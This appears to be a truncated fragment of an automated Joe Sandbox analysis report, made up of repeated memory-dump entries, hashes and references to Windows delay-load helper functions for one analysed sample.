                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 34e06189c98d19a89fd1759ac3849398647fcec6f273438d69544131b7304f50
                                                                                                  • Instruction ID: 892fd8f65a74adc0008881e6c224cf3dd106260ab300b614b768c7a1e6b2434f
                                                                                                  • Opcode Fuzzy Hash: 34e06189c98d19a89fd1759ac3849398647fcec6f273438d69544131b7304f50
                                                                                                  • Instruction Fuzzy Hash: 78B012D175C104BC310456151C06DB7015CD4C2B20330C43EFC06C0580D840AC851931
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 1aae3d0339a4de0ac48fe1833116a91ae20ba293532888ea10c3531e72646716
                                                                                                  • Instruction ID: ea5a67446531713f22f33bc9ee27f9476431fb7b3a80d3c303cf26b5d1003616
                                                                                                  • Opcode Fuzzy Hash: 1aae3d0339a4de0ac48fe1833116a91ae20ba293532888ea10c3531e72646716
                                                                                                  • Instruction Fuzzy Hash: 5AB012D535C208BC310451591D06DB7015CE4C2B10330C43EFC06C0080D8406C811A31
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 42348bea281b6aea5d75a2da226fd9881d196f3191b0169d4fcd31b6f98817da
                                                                                                  • Instruction ID: 5bb7d0d91e0e2b54aad7db03c8545d90fc4ad696d3364dd8b9e5975ee0c27d02
                                                                                                  • Opcode Fuzzy Hash: 42348bea281b6aea5d75a2da226fd9881d196f3191b0169d4fcd31b6f98817da
                                                                                                  • Instruction Fuzzy Hash: 85B012E135C104BC310451161D06DB701DCD4C1B14730843EFC06C0080DC406DC22931
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 1b61b2e2f5cc790249d4e5e240053da77d53fae858d5f5392407d40bd3c328b1
                                                                                                  • Instruction ID: b6f1a18abf08bc1d6ed267c6ba1db0fea48aec312fc315b4b1c9fb87d9bbfdeb
                                                                                                  • Opcode Fuzzy Hash: 1b61b2e2f5cc790249d4e5e240053da77d53fae858d5f5392407d40bd3c328b1
                                                                                                  • Instruction Fuzzy Hash: 13B012E175C104BC310451151C06DB7015CD4C3F10330C43EFC06C0081D840AD851931
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: b660634ae002de9d89eacaa6d0382017d4b991ff129895f526de078fe4b153b2
                                                                                                  • Instruction ID: 32c1c6f04feee47a1c82757e0ed054522e226035f21b92d5d965584c51002e0a
                                                                                                  • Opcode Fuzzy Hash: b660634ae002de9d89eacaa6d0382017d4b991ff129895f526de078fe4b153b2
                                                                                                  • Instruction Fuzzy Hash: 69B012D136C244BD314452151C06DB7015CD4C1B20330C53EFC06C0580D8406CC51931
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 6bb4ac769f6369893aaf87ff57faffb52c499f1dcd287d0c367804a8404460d7
                                                                                                  • Instruction ID: 91fbb2a420dff3acad31e5670147fbaab75b94722ff0acf8a7f04567d83925e3
                                                                                                  • Opcode Fuzzy Hash: 6bb4ac769f6369893aaf87ff57faffb52c499f1dcd287d0c367804a8404460d7
                                                                                                  • Instruction Fuzzy Hash: 02B012D135C104BC310452151D06DB7015CD4C1B20330C43EFC06C0580DC506D8A1931
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: dac6cf6cd0271f911b01f485a79cf836a08053a1e903233ef0eda927692a1b02
                                                                                                  • Instruction ID: cc359d4a00ebfe90b8e01b3843f9f130cb6279cbce6af08b4be3e3372a873431
                                                                                                  • Opcode Fuzzy Hash: dac6cf6cd0271f911b01f485a79cf836a08053a1e903233ef0eda927692a1b02
                                                                                                  • Instruction Fuzzy Hash: CEB012E135C104BC310455151D06DB7015CD4C2F10330843EFC06C0081DC406E821931
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 56fde4a16fde36535682aca08bd7d91030579568b176a142206d346ed4ee5c0c
• Instruction ID: ecc48fb884b7e0931c66ecba1d6f02a0b346273760eb9180ee0d40cce24ff8fd
• Opcode Fuzzy Hash: 56fde4a16fde36535682aca08bd7d91030579568b176a142206d346ed4ee5c0c
• Instruction Fuzzy Hash: B1B012E135C104BC310451161C06DB7015CE4C2F10330843EFC06C0081D8406D811931
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: e635243d8bf58c1d6d92bde90acf660a48fb9bdc6800d3cc5dc9f560878dd02f
• Instruction ID: 6f3074aef4219cbc306677c7a0cca7d998ec61aeffa54dffde86489854c4e544
• Opcode Fuzzy Hash: e635243d8bf58c1d6d92bde90acf660a48fb9bdc6800d3cc5dc9f560878dd02f
• Instruction Fuzzy Hash: B7B012E135C204BD314451151C06DB7015CD4C2F10330853EFC06C0081D8406DC11971
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 136f52fce0fc1e5ecf48ace46e91b6955eb3144da21c4cbc6a4a2b15c09fd8de
• Instruction ID: 9e6fd5c4753164ee485f9683a2830b54d9e1be4ee93c7f2f44c5cf84f223cade
• Opcode Fuzzy Hash: 136f52fce0fc1e5ecf48ace46e91b6955eb3144da21c4cbc6a4a2b15c09fd8de
• Instruction Fuzzy Hash: 8CB012E135D244BD314452151C06DB7015DD6C1B10730853EFC06C0080D8406CC51931
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 3fbabdeef0a4b14b326d556a4070f40329d6eb7484210a101095bfbec0d83e5b
• Instruction ID: e3cb72f101b5b5fa7ea4631dbe8088ca1c4ddeaa9e36519521ed70670acd2d36
• Opcode Fuzzy Hash: 3fbabdeef0a4b14b326d556a4070f40329d6eb7484210a101095bfbec0d83e5b
• Instruction Fuzzy Hash: 0DB012D175D144BC310451151C06DB7015DD6C2B10730C43EFC06C0080D840AC811931
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 048c7abe314040d57f8dde6485a0657f817ae900b0b2029fe163361ae867bc96
• Instruction ID: e1039a7ec163dcbb344ff69431039e1f82444ecac9bfe501e9eee3fa31b14c4e
• Opcode Fuzzy Hash: 048c7abe314040d57f8dde6485a0657f817ae900b0b2029fe163361ae867bc96
• Instruction Fuzzy Hash: 5CB012D136D144BC310451151C06DB7019DEAC1B10730843EFC07C0080D8406C811931
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 383eaffa8bfc8c306577138e0d1590d0a5a43a95f22415250ece2d767980b406
• Instruction ID: f53865ed98d03108831e6ade1c5fc5c07d99be9e3eff79122733b7f3eb86efe6
• Opcode Fuzzy Hash: 383eaffa8bfc8c306577138e0d1590d0a5a43a95f22415250ece2d767980b406
• Instruction Fuzzy Hash: 52B012D175C104BC310451261C06DB7019CD4C2B14330C43EFC06C0080D840ECC12931
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: a2fde1dade9e8d1246642e6f988433cf6710cfb6ed7e9d5d431a18bde03897b1
• Instruction ID: 268d77b5b21250d7536f2b17b6d8e261d8a072015cc9fed949ce44186551ae9a
• Opcode Fuzzy Hash: a2fde1dade9e8d1246642e6f988433cf6710cfb6ed7e9d5d431a18bde03897b1
• Instruction Fuzzy Hash: 9DB012E135C1157C310455041E03DB7025CC4C0B24330C42EFD14D1480D8400C8F0933
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 7f787345b4ed75c9e3abc3ae467ef11183a19556dd5533e93d984b0ae8f88c95
• Instruction ID: f7d53ae0b9c9dbf35bbd68b8871df5260e8e7ea32236c487af6a15dd55953f40
• Opcode Fuzzy Hash: 7f787345b4ed75c9e3abc3ae467ef11183a19556dd5533e93d984b0ae8f88c95
• Instruction Fuzzy Hash: 93B012F135C115FC310491041C03D77025CC4C0F14330C42EFC14D1081D8444E8A0933
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 2a48cb54ea2766835a568b33095c8762f344630ef221573b1525393da38b1083
• Instruction ID: f17361648e0addb6e4c05372fbdc9100ebf925f7956ef168d2793890e83b82cd
• Opcode Fuzzy Hash: 2a48cb54ea2766835a568b33095c8762f344630ef221573b1525393da38b1083
• Instruction Fuzzy Hash: 23B012E135C115BC310495041D03D77025CC4C0B24330C42EFC14D1480D8404C8A0933
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E580
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
